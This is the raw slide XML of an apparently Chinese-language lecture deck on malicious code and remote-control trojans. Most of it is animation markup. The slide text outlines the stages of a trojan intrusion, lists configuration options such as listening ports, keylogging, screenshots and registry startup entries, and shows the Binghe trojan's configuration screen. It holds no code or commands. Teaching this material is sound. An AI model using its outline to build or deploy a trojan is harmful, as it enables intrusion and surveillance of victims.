                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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1240067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="28" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="2" presetClass="entr" presetSubtype="9" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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1240067">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="34" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="2" presetClass="entr" presetSubtype="9" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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1240067">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF000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0067" grpId="0" uiExpand="1" build="p"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3138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马的运行步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马进行网络入侵的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传播木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启动木马 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>建立连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260341" y="2411413"/>
            <a:ext cx="5683634" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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243139">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">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243139">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D41AC77-7098-48C2-9A71-6394F447FDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信配置：监听端口、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>功能配置：文件读取、键盘监听、截屏等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装配置：安装路径、文件名、是否删除安装文件、注册表启动项等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE6846C-B26A-4EBF-929E-F835290C636B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33967107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AA0747B-BA61-4A68-B0F9-927EDE54CD2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>案例：冰河木马的配置界面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07AA595-AE9F-459A-828C-7A5EE4AE91B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="图片 1" descr="binghe-1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35ED7BC2-E8CB-47ED-946D-0BA9BD7DA5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607" y="2368446"/>
            <a:ext cx="4132522" cy="3573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图片 2" descr="binghe-2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058FCD01-DBB0-4567-951E-0E42B5E1EF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3459" y="2368446"/>
            <a:ext cx="4405934" cy="3573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图片 3" descr="binghe-3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3128C0-F70C-44F7-8533-66AA4D119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0122" y="2368446"/>
            <a:ext cx="4405934" cy="3573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4789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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>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027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>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1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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7A0F5BA-7FE5-4AEC-ABF8-E8C50DDD8A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356407" y="1374280"/>
            <a:ext cx="7960531" cy="4666756"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(malicious code)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：执行恶意功能的计算机代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同厂商（或学术机构）在恶意代码的分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一般都包括病毒、蠕虫和木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，其它的则有所不同）和定义上有所不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同时间段内，恶意代码的分类和定义也会有变化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF5B067B-0607-4E9D-99E4-F915A728DD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39879806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3138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马的运行步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马进行网络入侵的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传播木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启动木马 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>建立连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
